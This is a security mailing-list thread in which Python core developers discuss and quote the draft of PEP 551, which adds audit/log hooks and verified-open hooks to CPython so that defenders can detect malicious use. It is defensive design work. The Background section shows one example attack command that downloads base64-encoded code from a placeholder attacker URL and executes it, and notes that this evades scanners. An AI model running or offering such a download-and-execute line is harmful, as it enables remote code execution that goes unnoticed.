> On Windows, the hook will also open the file with flags that prevent any
> other
> process from opening it with write access, which allows the hook to perform
> additional validation on the contents with confidence that it will not be
> modified between the check and use. Compilation will later trigger a
> ``compile``
> event, so there is no need to read the contents now for AMSI, but other
> validation mechanisms such as DeviceGuard [4]_ should be performed here.
>
>
> Performance Impact
> ==================
>
> **TODO**
>
> Full impact analysis still requires investigation. Preliminary testing
> shows
> that calling ``sys.loghook`` with no hooks added does not significantly
> affect
> any existing benchmarks, though targeted microbenchmarks can observe an
> impact.
>
> Performance impact using ``spython`` or with hooks added are not of
> interest
> here, since this is considered opt-in functionality.
>
>
> Recommendations
> ===============
>
> Specific recommendations are difficult to make, as the ideal
> configuration for any environment will depend on the user's ability to
> manage, monitor, and respond to activity on their own network. However,
> many of the proposals here do not appear to be of value without deeper
> illustration. This section provides recommendations using the terms
> **should** (or **should not**), indicating that we consider it dangerous
> to ignore the advice, and **may**, indicating that for the advice ought
> to be considered for high value systems. The term **sysadmins** refers
> to whoever is responsible for deploying Python throughout your network,
> though different organizations may have different titles for the
> relevant person.
>
> Sysadmins **should** build their own entry point, likely starting from
> ``spython``, and directly interface with the security systems available
> in their environment. The more tightly integrated, the less likely a
> vulnerability will be found allowing an attacker to bypass those
> systems. In particular, the entry point **should not** obtain any
> settings from the current environment, such as environment variables,
> unless those settings are otherwise protected from modification.
>
> The default ``python`` entry point **should not** be deployed to
> production machines, but could be given to developers to use and test
> Python on non-production machines. Sysadmins **may** consider deploying
> a less restrictive version of their entry point to developer machines,
> since any system connected to your network is a potential target.
>
> Python deployments **should** be made read-only using any available
> platform functionality after deployment and during use.
>
> On platforms that support it, sysadmins **should** include signatures
> for every file in a Python deployment, ideally verified using a private
> certificate. For example, Windows supports embedding signatures in
> executable files and using catalogs for others, and can use DeviceGuard
> [4]_ to validate signatures either automatically or using an
> ``open_for_exec`` hook.
>
> Sysadmins **should** collect as many logged events as possible, and
> **should** copy them off of local machines frequently. Even if logs are
> not being constantly monitored for suspicious activity, once an attack
> is detected it is too late to enable logging. Log hooks **should not**
> attempt to preemptively filter events, as even benign events are useful
> when analyzing the progress of an attack. (Watch the "No Easy Breach"
> video under `Further Reading`_ for a deeper look at this side of things.)
>
> Log hooks **should** write events to logs before attempting to abort. As
> discussed earlier, it is more important to record malicious actions than
> to prevent them. Very few actions should be aborted, as most will occur
> during normal use. Sysadmins **may** audit their Python code and abort
> operations that are known to never be used deliberately.
>
> On production machines, the first log hook **should** be set in C code
> before ``Py_Initialize`` is called, and that hook **should**
> unconditionally abort the ``sys.addloghook`` event. The Python interface
> is mainly useful for testing.
>
> On production machines, a non-validating ``open_for_exec`` hook **may**
> be set in C code before ``Py_Initialize`` is called. This prevents later
> code from overriding the hook, however, logging the
> ``setopenforexecutehandler`` event is useful since no code should ever
> need to call it. Using at least the sample ``open_for_exec`` hook
> implementation from ``spython`` is recommended.
>
> [TODO: more good advice; less bad advice]
>
> Further Reading
> ===============
>
>
> **Redefining Malware: When Old Terms Pose New Threats**
>      By Aviv Raff for SecurityWeek, 29th January 2014
>
>      This article, and those linked by it, are high-level summaries of
> the rise of
>      APTs and the differences from "traditional" malware.
>
>
> `<
> http://www.securityweek.com/redefining-malware-when-old-terms-pose-new-threats
> >`_
>
> **Anatomy of a Cyber Attack**
>      By FireEye, accessed 23rd August 2017
>
>      A summary of the techniques used by APTs, and links to a number of
> relevant
>      whitepapers.
>
>
> `<https://www.fireeye.com/current-threats/anatomy-of-a-cyber-attack.html
> >`_
>
> **Automated Traffic Log Analysis: A Must Have for Advanced Threat
> Protection**
>      By Aviv Raff for SecurityWeek, 8th May 2014
>
>      High-level summary of the value of detailed logging and automatic
> analysis.
>
>
> `<
> http://www.securityweek.com/automated-traffic-log-analysis-must-have-advanced-threat-protection
> >`_
>
> **No Easy Breach: Challenges and Lessons Learned from an Epic
> Investigation**
>      Video presented by Matt Dunwoody and Nick Carr for Mandiant at
> SchmooCon 2016
>
>      Detailed walkthrough of the processes and tools used in detecting
> and removing
>      an APT.
>
>      `<https://archive.org/details/No_Easy_Breach>`_
>
> **Disrupting Nation State Hackers**
>      Video presented by Rob Joyce for the NSA at USENIX Enigma 2016
>
>      Good security practices, capabilities and recommendations from the
> chief of
>      NSA's Tailored Access Operation.
>
>      `<https://www.youtube.com/watch?v=bDJb8WOJYdA>`_
>
> References
> ==========
>
> .. [1] Assume Breach Mindset, `<http://asian-power.com/node/11144>`_
>
> .. [2] PowerShell Loves the Blue Team, also known as Scripting Security and
>     Protection Advances in Windows 10,
> `<
> https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/
> >`_
>
> .. [3]
> `<
> https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
> >`_
>
> .. [4] `<https://aka.ms/deviceguard>`_
>
> .. [5] AMSI,
> `<
> https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx
> >`_
>
> .. [6] Persistent Zone Identifiers,
> `<https://msdn.microsoft.com/en-us/library/ms537021(v=vs.85).aspx>`_
>
> .. [7] Event tracing,
> `<https://msdn.microsoft.com/en-us/library/aa363668(v=vs.85).aspx>`_
>
> .. [8] `<https://www.gnupg.org/>`_
>
> .. [9] `<https://www.systutorials.com/docs/linux/man/3-sd_journal_send/>`_
>
> .. [10] `<http://www.trustedbsd.org/openbsm.html>`_
>
> .. [11] `<https://linux.die.net/man/3/syslog>`_
>
> Acknowledgments
> ===============
>
> Thanks to all the people from Microsoft involved in helping make the Python
> runtime safer for production use, and especially to James Powell for
> doing much
> of the initial research, analysis and implementation, Lee Holmes for
> invaluable
> insights into the info-sec field and PowerShell's responses, and Brett
> Cannon
> for the grounding discussions.
>
> Copyright
> =========
>
> Copyright (c) 2017 by Microsoft Corporation. This material may be
> distributed
> only subject to the terms and conditions set forth in the Open Publication
> License, v1.0 or later (the latest version is presently available at
> http://www.opencontent.org/openpub/).
>
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.python.org/pipermail/security-sig/attachments/20170826/4692dae9/attachment-0001.html>

From steve.dower at python.org  Sat Aug 26 11:42:42 2017
From: steve.dower at python.org (Steve Dower)
Date: Sat, 26 Aug 2017 08:42:42 -0700
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <CAP1=2W43bRebitrQpRbR0U0z2AusGozutDWyaFL1vjD-8UAmyg@mail.gmail.com>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CAP1=2W6Kmjfrkg49hkT8B--cZmO=Nd4W4cvjrrYL8NoJbGuxxw@mail.gmail.com>
 <E1dl4HZ-0007dO-Sb@se2-syd.hostedmail.net.au>
 <CAP1=2W43bRebitrQpRbR0U0z2AusGozutDWyaFL1vjD-8UAmyg@mail.gmail.com>
Message-ID: <E1dldEX-0000N5-EP@se2-syd.hostedmail.net.au>

Forcing people to think about what restrictions they implement (by extending/modifying spython.c) is a feature :)

The idea is that importlib and similar code should just use open_for_exec when they?re opening files that will be executed, and let the hook (if any) worry about validating extensions. The overridden function is needed because as you said, there?s currently one open call that is used for opening both code and data files, and for data files it should just use regular open(). The override can just be permanently there, since with no hook there?s no difference. (And custom subclasses may also need updating, which gets back to ?if you don?t control the code that?s running then none of these protections will protect you? and you have to rely on audit hooks.)

Top-posted from my Windows phone

From: Brett Cannon
Sent: Saturday, August 26, 2017 6:46
To: Steve Dower; security-sig at python.org
Cc: james at dontusethiscode.com; lee.holmes at microsoft.com
Subject: Re: PEP 551: Security transparency in the Python runtime

Is there going to be a visible flag or anything to know you're running a restricted version of Python? If so then a subclass will allow us to override get_code() so that it just skips .pyc files and it can be used automatically when the flag is set. That way users of spython don't have to think about setting that up. Otherwise we could provide a function in importlib._bootstrap that you call during initialization to turn this on.

P.S. sorry to everyone for the slightly scattered comments; doing all of these emails from my phone while in NYC for JupyterCon.
On Thu, Aug 24, 2017, 22:24 Steve Dower <steve.dower at python.org> wrote:
I think overriding get_data in the subclass for source loading is the right approach. Rejecting .pyc files in the hook is easy enough, but for anyone doing proper validation (with a certificate or access control) I?d expect pyc?s to fail anyway.
?
Top-posted from my Windows phone
?
From: Brett Cannon
Sent: Thursday, August 24, 2017 18:58
To: Steve Dower; security-sig at python.org
Cc: lee.holmes at microsoft.com; james at dontusethiscode.com
Subject: Re: PEP 551: Security transparency in the Python runtime
?
One point to make about the importlib changes is that since it's currently being made to importlib.abc.FileLoader.get_data() that the default case for reading a non-.py file is to do nothing and allow the read to occur. Otherwise there will be issues with code that is using that method to read data files (which is a legit use-case). Otherwise we're going to need a new subclass of importlib.machinery.SourceFileLoader where we document that you can't use get_data() to read arbitrary bytes or restructure get_code() to not use get_data(). Or we need a new API to flag when get_data() should do a verifying open().
There should also the issue of not reading .pyc files which will either have to be addressed by coming up with a complimentary flag to PYTHONDONTWRITEBYTECODE or once again a special subclass where get_code() ignores bytecode completely.
?
On Thu, 24 Aug 2017 at 13:14 Steve Dower <steve.dower at python.org> wrote:
Hi security-sig,

Those of you who were at the PyCon US language summit this year (or who
saw the coverage at https://lwn.net/Articles/723823/) may recall that I
talked briefly about the ways Python is used by attackers to gain and/or
retain access to systems on local networks.

This comes out of work we've been doing at Microsoft to balance the
flexibility of scripting languages with their usefulness to malicious
users. PowerShell in particular has had a lot of work done, and we've
been doing the same internally for Python. Things like transcripting
(log every piece of code when it is compiled) and signature validation
(prevent loading unsigned code).

This PEP is about upstreaming enough functionality to make it easier to
maintain these features - it is *not* intended to add specific security
features to the core release. The aim is to be able to use a standard
libpython3.7/python37.dll with a custom python3.7/python.exe that adds
those features (listed in the PEP).

Right now parts of the PEP is incomplete. In particular, the
Recommendations section is much shorter than I intend, the list of log
hook locations is also too short, and I have only done a preliminary
performance analysis. But it's time to get reviews of the overall
concept. I'd also like to take suggestions for more hook locations and
relevant recommendations, so feel free to throw them out there. In
particular, I'm not as up to date on best practices for non-Windows
platforms as the rest of the list, so feel free to correct or improve
those parts.

Because ReST+max 80 character width makes tables completely unreadable
in source, I suggest reading it at
https://github.com/python/peps/blob/master/pep-0551.rst but I've
included the full text below for quoting purposes.

My current implementation is available at
https://github.com/zooba/cpython/tree/sectrans and should work on both
Windows and Linux. I hope to take this to python-dev by next week and
spend the dev sprints getting the PEP to the point where it can be accepted.

==========================================================

PEP: 551
Title: Security transparency in the Python runtime
Version: $Revision$
Last-Modified: $Date$
Author: Steve Dower <steve.dower at python.org>
Status: Draft
Type: Standards Track
Content-Type: text/x-rst
Created: 23-Aug-2017
Python-Version: 3.7
Post-History:

Abstract
========

This PEP describes additions to the Python API and specific behaviors
for the
CPython implementation that make actions taken by the Python runtime
visible to
security and auditing tools. The goals in order of increasing importance
are to
prevent malicious use of Python, to detect and report on malicious use,
and most
importantly to detect attempts to bypass detection. Most of the
responsibility
for implementation is required from users, who must customize and build
Python
for their own environment.

We propose two small sets of public APIs to enable users to reliably
build their
copy of Python without having to modify the core runtime, protecting future
maintainability. We also discuss recommendations for users to help them
develop
and configure their copy of Python.

Background
==========

Software vulnerabilities are generally seen as bugs that enable remote or
elevated code execution. However, in our modern connected world, the more
dangerous vulnerabilities are those that enable advanced persistent threats
(APTs). APTs are achieved when an attacker is able to penetrate a network,
establish their software on one or more machines, and over time extract
data or
intelligence. Some APTs may make themselves known by maliciously
damaging data
(e.g., `WannaCrypt
<https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/WannaCrypt>`_)
or hardware (e.g., `Stuxnet
<https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?name=Win32/Stuxnet>`_).
Most attempt to hide their existence and avoid detection. APTs often use a
combination of traditional vulnerabilities, social engineering, phishing (or
spear-phishing), thorough network analysis, and an understanding of
misconfigured environments to establish themselves and do their work.

The first infected machines may not be the final target and may not require
special privileges. For example, an APT that is established as a
non-administrative user on a developer?s machine may have the ability to
spread
to production machines through normal deployment channels. It is common
for APTs
to persist on as many machines as possible, with sheer weight of
presence making
them difficult to remove completely.

Whether an attacker is seeking to cause direct harm or hide their
tracks, the
biggest barrier to detection is a lack of insight. System administrators
with
large networks rely on distributed logs to understand what their
machines are
doing, but logs are often filtered to show only error conditions. APTs
that are
attempting to avoid detection will rarely generate errors or abnormal
events.
Reviewing normal operation logs involves a significant amount of effort,
though
work is underway by a number of companies to enable automatic anomaly
detection
within operational logs. The tools preferred by attackers are ones that are
already installed on the target machines, since log messages from these
tools
are often expected and ignored in normal use.

At this point, we are not going to spend further time discussing the
existence
of APTs or methods and mitigations that do not apply to this PEP. For
further
information about the field, we recommend reading or watching the resources
listed under `Further Reading`_.

Python is a particularly interesting tool for attackers due to its
prevalence on
server and developer machines, its ability to execute arbitrary code
provided as
data (as opposed to native binaries), and its complete lack of internal
logging.
This allows attackers to download, decrypt, and execute malicious code
with a
single command::

? ? ?python -c "import urllib.request, base64;
exec(base64.b64decode(urllib.request.urlopen('http://my-exploit/py.b64')).decode())"

This command currently bypasses most anti-malware scanners that rely on
recognizable code being read through a network connection or being
written to
disk (base64 is often sufficient to bypass these checks). It also bypasses
protections such as file access control lists or permissions (no file access
occurs), approved application lists (assuming Python has been approved
for other
uses), and automated auditing or logging (assuming Python is allowed to
access
the internet or access another machine on the local network from which
to obtain
its payload).

General consensus among the security community is that totally preventing
attacks is infeasible and defenders should assume that they will often
detect
attacks only after they have succeeded. This is known as the "assume breach"
mindset. [1]_ In this scenario, protections such as sandboxing and input
validation have already failed, and the important task is detection,
tracking,
and eventual removal of the malicious code. To this end, the primary feature
required from Python is security transparency: the ability to see what
operations the Python runtime is performing that may indicate anomalous or
malicious use. Preventing such use is valuable, but secondary to the need to
know that it is occurring.

To summarise the goals in order of increasing importance:

* preventing malicious use is valuable
* detecting malicious use is important
* detecting attempts to bypass detection is critical

One example of a scripting engine that has addressed these challenges is
PowerShell, which has recently been enhanced towards similar goals of
transparency and prevention. [2]_

Generally, application and system configuration will determine which events
within a scripting engine are worth logging. However, given the value of
many
logs events are not recognized until after an attack is detected, it is
important to capture as much as possible and filter views rather than
filtering
at the source (see the No Easy Breach video from above). Events that are
always
of interest include attempts to bypass event logging, attempts to load and
execute code that is not correctly signed or access-controlled, use of
uncommon
operating system functionality such as debugging or inter-process inspection
tools, most network access and DNS resolution, and attempts to create
and hide
files or configuration settings on the local machine.

To summarize, defenders have a need to audit specific uses of Python in
order to
detect abnormal or malicious usage. Currently, the Python runtime does not
provide any ability to do this, which (anecdotally) has led to organizations
switching to other languages. The aim of this PEP is to enable system
administrators to deploy a security transparent copy of Python that can
integrate with their existing auditing and protection systems.

On Windows, some specific features that may be enabled by this include:

* Script Block Logging [3]_
* DeviceGuard [4]_
* AMSI [5]_
* Persistent Zone Identifiers [6]_
* Event tracing (which includes event forwarding) [7]_

On Linux, some specific features that may be integrated are:

* gnupg [8]_
* sd_journal [9]_
* OpenBSM [10]_
* syslog [11]_
* check execute bit on imported modules


On macOS, some features that may be used with the expanded APIs are:

* OpenBSM [10]_
* syslog [11]_

Overall, the ability to enable these platform-specific features on
production
machines is highly appealing to system administrators and will make Python a
more trustworthy dependency for application developers.


Overview of Changes
===================

True security transparency is not fully achievable by Python in
isolation. The
runtime can log as many events as it likes, but unless the logs are
reviewed and
analyzed there is no value. Python may impose restrictions in the name of
security, but usability may suffer. Different platforms and environments
will
require different implementations of certain security features, and
organizations with the resources to fully customize their runtime should be
encouraged to do so.

The aim of these changes is to enable system administrators to integrate
Python
into their existing security systems, without dictating what those
systems look
like or how they should behave. We propose two API changes to enable
this: an
Event Log Hook and Verified Open Hook. Both are not set by default, and both
require modifying the appropriate entry point to enable any
functionality. For
the purposes of validation and example, we propose a new spython/spython.exe
entry point program that enables some basic functionality using these hooks.
However, the expectation is that security-conscious organizations will
create
their own entry points to meet their needs.

Event Log Hook
--------------

In order to achieve security transparency, an API is required to raise
messages
from within certain operations. These operations are typically deep
within the
Python runtime or standard library, such as dynamic code compilation, module
imports, DNS resolution, or use of certain modules such as ``ctypes``.

The new APIs required for log hooks are::

? ? # Add a logging hook
? ? sys.addloghook(hook: Callable[str, tuple]) -> None
? ? int PySys_AddLogHook(int (*hook)(const char *event, PyObject *args));

? ? # Raise an event with all logging hooks
? ? sys.loghook(str, *args) -> None
? ? int PySys_LogHook(const char *event, PyObject *args);

? ? # Internal API used during Py_Finalize() - not publicly accessible
? ? void _Py_ClearLogHooks(void);

Hooks are added by calling ``PySys_AddLogHook()`` from C at any time,
including
before ``Py_Initialize()``, or by calling ``sys.addloghook()`` from
Python code.
Hooks are never removed or replaced, and existing hooks have an
opportunity to
refuse to allow new hooks to be added (adding a logging hook is logged,
and so
preexisting hooks can raise an exception to block the new addition).

When events of interest are occurring, code can either call
``PySys_LogHook()``
from C (while the GIL is held) or ``sys.loghook()``. The string argument
is the
name of the event, and the tuple contains arguments. A given event name
should
have a fixed schema for arguments, and both arguments are considered a
public
API (for a given x.y version of Python), and thus should only change between
feature releases with updated documentation.

When an event is logged, each hook is called in the order it was added
with the
event name and tuple. If any hook returns with an exception set, later
hooks are
ignored and *in general* the Python runtime should terminate. This is
intentional to allow hook implementations to decide how to respond to any
particular event. The typical responses will be to log the event, abort the
operation with an exception, or to immediately terminate the process with an
operating system exit call.

When an event is logged but no hooks have been set, the ``loghook()``
function
should include minimal overhead. Ideally, each argument is a reference to
existing data rather than a value calculated just for the logging call.

As hooks may be Python objects, they need to be freed during
``Py_Finalize()``.
To do this, we add an internal API ``_Py_ClearLogHooks()`` that releases any
``PyObject*`` hooks that are held, as well as any heap memory used. This
is an
internal function with no public export, but it passes an event to all
existing
hooks to ensure that unexpected calls are logged.

See `Log Hook Locations`_ for proposed log hook points and schemas, and the
`Recommendations`_ section for discussion on appropriate responses.

Verified Open Hook
------------------

Most operating systems have a mechanism to distinguish between files
that can be
executed and those that can not. For example, this may be an execute bit
in the
permissions field, or a verified hash of the file contents to detect
potential
code tampering. These are an important security mechanism for preventing
execution of data or code that is not approved for a given environment.
Currently, Python has no way to integrate with these when launching
scripts or
importing modules.

The new public API for the verified open hook is::

? ? # Set the handler
? ? int Py_SetOpenForExecuteHandler(PyObject *(*handler)(const char
*narrow, const wchar_t *wide))

? ? # Open a file using the handler
? ? os.open_for_exec(pathlike)

The ``os.open_for_exec()`` function is a drop-in replacement for
``open(pathlike, 'rb')``. Its default behaviour is to open a file for raw,
binary access - any more restrictive behaviour requires the use of a custom
handler. (Aside: since ``importlib`` requires access to this function
before the
``os`` module has been imported, it will be available on the
``nt``/``posix``
modules, but the intent is that other users will access it through the
``os``
module.)

A custom handler may be set by calling ``Py_SetOpenForExecuteHandler()``
from C
at any time, including before ``Py_Initialize()``. When
``open_for_exec()`` is
called with a handler set, the handler will be passed the processed
narrow or
wide path, depending on platform, and its return value will be returned
directly. The returned object should be an open file-like object that
supports
reading raw bytes. This is explicitly intended to allow a ``BytesIO``
instance
if the open handler has already had to read the file into memory in order to
perform whatever verification is necessary to determine whether the
content is
permitted to be executed.

Note that these handlers can import and call the ``_io.open()`` function on
CPython without triggering themselves.

If the handler determines that the file is not suitable for execution,
it should
raise an exception of its choice, as well as performing any other logging or
notifications.

All import and execution functionality involving code from a file will be
changed to use ``open_for_exec()`` unconditionally. It is important to
note that
calls to ``compile()``, ``exec()`` and ``eval()`` do not go through this
function - a log hook that includes the code from these calls will be
added and
is the best opportunity to validate code that is read from the file.
Given the
current decoupling between import and execution in Python, most imported
code
will go through both ``open_for_exec()`` and the log hook for
``compile``, and
so care should be taken to avoid repeating verification steps.

API Availability
----------------

While all the functions added here are considered public and stable API, the
behavior of the functions is implementation specific. The descriptions here
refer to the CPython implementation, and while other implementations should
provide the functions, there is no requirement that they behave the same.

For example, ``sys.addloghook()`` and ``sys.loghook()`` should exist but
may do
nothing. This allows code to make calls to ``sys.loghook()`` without
having to
test for existence, but it should not assume that its call will have any
effect.
(Including existence tests in security-critical code allows another
vector to
bypass logging, so it is preferable that the function always exist.)

``os.open_for_exec()`` should at a minimum always return
``_io.open(pathlike,
'rb')``. Code using the function should make no further assumptions
about what
may occur, and implementations other than CPython are not required to let
developers override the behavior of this function with a hook.


Log Hook Locations
==================

Calls to ``sys.loghook()`` or ``PySys_LogHook()`` will be added to the
following
operations with the schema in Table 1. Unless otherwise specified, the
ability
for log hooks to abort any listed operation should be considered part of the
rationale for including the hook.

.. csv-table:: Table 1: Log Hooks
? ? :header: "API Function", "Event Name", "Arguments", "Rationale"
? ? :widths: 2, 2, 3, 6

? ? ``PySys_AddLogHook``, ``sys.addloghook``, "", "Detect when new log
hooks are
? ? being added."
? ? ``_PySys_ClearLogHooks``, ``sys._clearloghooks``, "", "Notifies
hooks they
? ? are being cleaned up, mainly in case the event is triggered
unexpectedly.
? ? This event cannot be aborted."
? ? ``Py_SetOpenForExecuteHandler``, ``setopenforexecutehandler``, "",
"Detects
? ? any attempt to set the ``open_for_execute`` handler."
? ? "``compile``, ``exec``, ``eval``, ``PyAst_CompileString``",
``compile``, "
? ? ``(code, filename_or_none)``", "Detect dynamic code compilation.
Note that
? ? this will also be called for regular imports of source code,
including those
? ? that used ``open_for_exec``."
? ? ``import``, ``import``, "``(module, filename, sys.path, sys.meta_path,
? ? sys.path_hooks)``", "Detect when modules are imported. This is
raised before
? ? the module name is resolved to a file. All arguments other than the
module
? ? name may be ``None`` if they are not used or available."
? ? "``_ctypes.dlopen``, ``_ctypes.LoadLibrary``", ``ctypes.dlopen``, "
? ? ``(module_or_path,)``", "Detect when native modules are used."
? ? ``_ctypes._FuncPtr``, ``ctypes.dlsym``, "``(lib_object, name)``",
"Collect
? ? information about specific symbols retrieved from native modules."
? ? ``_ctypes._CData``, ``ctypes.cdata``, "``(ptr_as_int,)``", "Detect
when code
? ? is accessing arbitrary memory using ``ctypes``"
? ? ``id``, ``id``, "``(id_as_int,)``", "Detect when code is accessing
the id of
? ? objects, which in CPython reveals information about memory layout."
? ? ``sys._getframe``, ``sys._getframe``, "``(frame_object,)``", "Detect
when
? ? code is accessing frames directly"
? ? ``sys._current_frames``, ``sys._current_frames``, "", "Detect when
code is
? ? accessing frames directly"
? ? ``PyEval_SetProfile``, ``sys.setprofile``, "", "Detect when code is
injecting
? ? trace functions. Because of the implementation, exceptions raised
from the
? ? hook will abort the operation, but will not be raised in Python
code. Note
? ? that ``threading.setprofile`` eventually calls this function, so the
event
? ? will be logged for each thread."
? ? ``PyEval_SetTrace``, ``sys.settrace``, "", "Detect when code is
injecting
? ? trace functions. Because of the implementation, exceptions raised
from the
? ? hook will abort the operation, but will not be raised in Python
code. Note
? ? that ``threading.settrace`` eventually calls this function, so the event
? ? will be logged for each thread."
? ? ``_PyEval_SetAsyncGenFirstiter``, ``sys.set_async_gen_firstiter``, "", "
? ? Detect changes to async generator hooks."
? ? ``_PyEval_SetAsyncGenFinalizer``, ``sys.set_async_gen_finalizer``, "", "
? ? Detect changes to async generator hooks."
? ? ``_PyEval_SetCoroutineWrapper``, ``sys.set_coroutine_wrapper``, "",
"Detect
? ? changes to the coroutine wrapper."
? ? ``Py_SetRecursionLimit``, ``sys.setrecursionlimit``,
"``(new_limit,)``", "
? ? Detect changes to the recursion limit."
? ? ``_PyEval_SetSwitchInterval``, ``sys.setswitchinterval``,
"``(interval_us,)``
? ? ", "Detect changes to the switching interval."
? ? "``socket.bind``, ``socket.connect``, ``socket.connect_ex``,
? ? ``socket.sendmsg``, ``socket.sendto``", ``socket.address``,
"``(address,)``
? ? ", "Detect access to network resources. The address is unmodified
from the
? ? original call."
? ? ``socket.__init__``, "socket()", "``(family, type, proto)``", "Detect
? ? creation of sockets. The arguments will be int values."
? ? ``socket.gethostname``, ``socket.gethostname``, "", "Detect attempts to
? ? retrieve the current host name."
? ? ``socket.sethostname``, ``socket.sethostname``, "``(name,)``", "Detect
? ? attempts to change the current host name. The name argument is
passed as a
? ? bytes object."
? ? "``socket.gethostbyname``, ``socket.gethostbyname_ex``", "
? ? ``socket.gethostbyname``", "``(name,)``", "Detect host name
resolution. The
? ? name argument is a str or bytes object."
? ? ``socket.gethostbyaddr``, ``socket.gethostbyaddr``,
"``(address,)``", "Detect
? ? host resolution. The address argument is a str or bytes object."
? ? ``socket.getservbyname``, ``socket.getservbyname``, "``(name,
protocol)``", "
? ? Detect service resolution. The arguments are str objects."
? ? ``socket.getservbyport``, ``socket.getservbyport``, "``(port,
protocol)``", "
? ? Detect service resolution. The port argument is an int and protocol is a
? ? str."

TODO - more hooks in ``_socket``, ``_ssl``, others?


SPython Entry Point
===================

A new entry point binary will be added, called ``spython.exe`` on
Windows and
``spythonX.Y`` on other platforms. This entry point is intended
primarily as an
example, as we expect most users of this functionality to implement
their own
entry point and hooks (see `Recommendations`_). It will also be used for
tests.

Source builds will create ``spython`` by default, but distributors may
choose
whether to include ``spython`` in their pre-built packages. The python.org
managed binary distributions will not include ``spython``.

**Do not accept most command-line arguments**

The ``spython`` entry point requires a script file be passed as the first
argument, and does not allow any options. This prevents arbitrary code
execution
from in-memory data or non-script files (such as pickles, which can be
executed
using ``-m pickle <path>``.

Options ``-B`` (do not write bytecode), ``-E`` (ignore environment
variables)
and ``-s`` (no user site) are assumed.

If a file with the same full path as the process with a ``._pth`` suffix
(``spython._pth`` on Windows, ``spythonX.Y._pth`` on Linux) exists, it
will be
used to initialize ``sys.path`` following the rules currently described `for
Windows <https://docs.python.org/3/using/windows.html#finding-modules>`_.

**Log security events to a file**

Before initialization, ``spython`` will set a log hook that writes
events to a
local file. By default, this file is the full path of the process with a
``.log`` suffix, but may be overridden with the ``SPYTHONLOG`` environment
variable (despite such overrides being explicitly discouraged in
`Recommendations`_).

The log hook will also abort all ``addloghook`` events, preventing any other
hooks from being added.

On Windows, code from ``compile`` events will submitted to AMSI [5]_ and
if it
fails to validate, the compile event will be aborted. This can be tested by
calling ``compile()`` or ``eval()`` on the contents of the `EICAR test file
<http://www.eicar.org/86-0-Intended-use.html>`_.

**Restrict importable modules**

Also before initialization, ``spython`` will set an open-for-execute
hook that
validates all files opened with ``os.open_for_exec``. This
implementation will
require all files to have a ``.py`` suffix (thereby blocking the use of
cached
bytecode), and will raise a custom log message ``spython.open_for_exec``
containing ``(filename, True_if_allowed)``.

On Windows, the hook will also open the file with flags that prevent any
other
process from opening it with write access, which allows the hook to perform
additional validation on the contents with confidence that it will not be
modified between the check and use. Compilation will later trigger a
``compile``
event, so there is no need to read the contents now for AMSI, but other
validation mechanisms such as DeviceGuard [4]_ should be performed here.


Performance Impact
==================

**TODO**

Full impact analysis still requires investigation. Preliminary testing shows
that calling ``sys.loghook`` with no hooks added does not significantly
affect
any existing benchmarks, though targeted microbenchmarks can observe an
impact.

Performance impact using ``spython`` or with hooks added are not of interest
here, since this is considered opt-in functionality.


Recommendations
===============

Specific recommendations are difficult to make, as the ideal
configuration for any environment will depend on the user's ability to
manage, monitor, and respond to activity on their own network. However,
many of the proposals here do not appear to be of value without deeper
illustration. This section provides recommendations using the terms
**should** (or **should not**), indicating that we consider it dangerous
to ignore the advice, and **may**, indicating that for the advice ought
to be considered for high value systems. The term **sysadmins** refers
to whoever is responsible for deploying Python throughout your network,
though different organizations may have different titles for the
relevant person.

Sysadmins **should** build their own entry point, likely starting from
``spython``, and directly interface with the security systems available
in their environment. The more tightly integrated, the less likely a
vulnerability will be found allowing an attacker to bypass those
systems. In particular, the entry point **should not** obtain any
settings from the current environment, such as environment variables,
unless those settings are otherwise protected from modification.

The default ``python`` entry point **should not** be deployed to
production machines, but could be given to developers to use and test
Python on non-production machines. Sysadmins **may** consider deploying
a less restrictive version of their entry point to developer machines,
since any system connected to your network is a potential target.

Python deployments **should** be made read-only using any available
platform functionality after deployment and during use.

On platforms that support it, sysadmins **should** include signatures
for every file in a Python deployment, ideally verified using a private
certificate. For example, Windows supports embedding signatures in
executable files and using catalogs for others, and can use DeviceGuard
[4]_ to validate signatures either automatically or using an
``open_for_exec`` hook.

Sysadmins **should** collect as many logged events as possible, and
**should** copy them off of local machines frequently. Even if logs are
not being constantly monitored for suspicious activity, once an attack
is detected it is too late to enable logging. Log hooks **should not**
attempt to preemptively filter events, as even benign events are useful
when analyzing the progress of an attack. (Watch the "No Easy Breach"
video under `Further Reading`_ for a deeper look at this side of things.)

Log hooks **should** write events to logs before attempting to abort. As
discussed earlier, it is more important to record malicious actions than
to prevent them. Very few actions should be aborted, as most will occur
during normal use. Sysadmins **may** audit their Python code and abort
operations that are known to never be used deliberately.

On production machines, the first log hook **should** be set in C code
before ``Py_Initialize`` is called, and that hook **should**
unconditionally abort the ``sys.addloghook`` event. The Python interface
is mainly useful for testing.

On production machines, a non-validating ``open_for_exec`` hook **may**
be set in C code before ``Py_Initialize`` is called. This prevents later
code from overriding the hook, however, logging the
``setopenforexecutehandler`` event is useful since no code should ever
need to call it. Using at least the sample ``open_for_exec`` hook
implementation from ``spython`` is recommended.

[TODO: more good advice; less bad advice]

Further Reading
===============


**Redefining Malware: When Old Terms Pose New Threats**
? ? ?By Aviv Raff for SecurityWeek, 29th January 2014

? ? ?This article, and those linked by it, are high-level summaries of
the rise of
? ? ?APTs and the differences from "traditional" malware.


`<http://www.securityweek.com/redefining-malware-when-old-terms-pose-new-threats>`_

**Anatomy of a Cyber Attack**
? ? ?By FireEye, accessed 23rd August 2017

? ? ?A summary of the techniques used by APTs, and links to a number of
relevant
? ? ?whitepapers.


`<https://www.fireeye.com/current-threats/anatomy-of-a-cyber-attack.html>`_

**Automated Traffic Log Analysis: A Must Have for Advanced Threat
Protection**
? ? ?By Aviv Raff for SecurityWeek, 8th May 2014

? ? ?High-level summary of the value of detailed logging and automatic
analysis.


`<http://www.securityweek.com/automated-traffic-log-analysis-must-have-advanced-threat-protection>`_

**No Easy Breach: Challenges and Lessons Learned from an Epic
Investigation**
